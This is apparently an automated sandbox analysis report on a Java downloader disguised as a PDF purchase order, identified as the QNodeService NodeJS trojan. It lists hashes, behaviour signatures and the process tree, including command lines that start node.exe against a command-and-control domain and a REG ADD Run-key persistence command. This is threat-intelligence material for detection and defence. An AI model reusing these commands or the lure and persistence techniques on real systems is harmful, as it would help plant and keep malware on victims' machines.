Analysis
-
max time kernel
37s -
max time network
130s -
platform
windows10_x64 -
resource
win10 -
submitted
19-10-2020 10:11
Static task
static1
Behavioral task
behavioral1
Sample
Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
Resource
win7v200722
Behavioral task
behavioral2
Sample
Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
Resource
win10
General
-
Target
Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
-
Size
76KB
-
MD5
b87b80852063d48f3373fcee56a9a9c1
-
SHA1
25fd2c6d43ec8335f7f793e339d07c3517e7737d
-
SHA256
cd71c5e1f36a2fa25cd515061e8e9eb52d993af7179b7068e7ec1faeab137858
-
SHA512
d23416931e8968b0e16ce96036113fb9ff3483d0e3344d0fc4570feff1aa3101676c469da31ca28afccbea22f3328cc5a7f2f6bdecb3edfe4bd0fce9cdf70562
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3800 node.exe 1304 node.exe 2120 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\e34ca5b1-6f1a-4260-8eac-bb9ada17b339 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad91-173.dat js behavioral2/files/0x000100000001ad91-178.dat js behavioral2/files/0x000100000001ad91-182.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 wtfismyip.com 26 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3800 node.exe 3800 node.exe 3800 node.exe 3800 node.exe 1304 node.exe 1304 node.exe 1304 node.exe 1304 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2984 wrote to memory of 2644 2984 java.exe 76 PID 2984 wrote to memory of 2644 2984 java.exe 76 PID 2644 wrote to memory of 3800 2644 javaw.exe 78 PID 2644 wrote to memory of 3800 2644 javaw.exe 78 PID 3800 wrote to memory of 1304 3800 node.exe 80 PID 3800 wrote to memory of 1304 3800 node.exe 80 PID 1304 wrote to memory of 2120 1304 node.exe 81 PID 1304 wrote to memory of 2120 1304 node.exe 81 PID 2120 wrote to memory of 3788 2120 node.exe 83 PID 2120 wrote to memory of 3788 2120 node.exe 83 PID 3788 wrote to memory of 2196 3788 cmd.exe 84 PID 3788 wrote to memory of 2196 3788 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e6ad94e0.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums330.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_euGUNF\boot.js --hub-domain ntums330.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_euGUNF\boot.js --hub-domain ntums330.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e34ca5b1-6f1a-4260-8eac-bb9ada17b339" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e34ca5b1-6f1a-4260-8eac-bb9ada17b339" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2196
-
-
-
-
-
-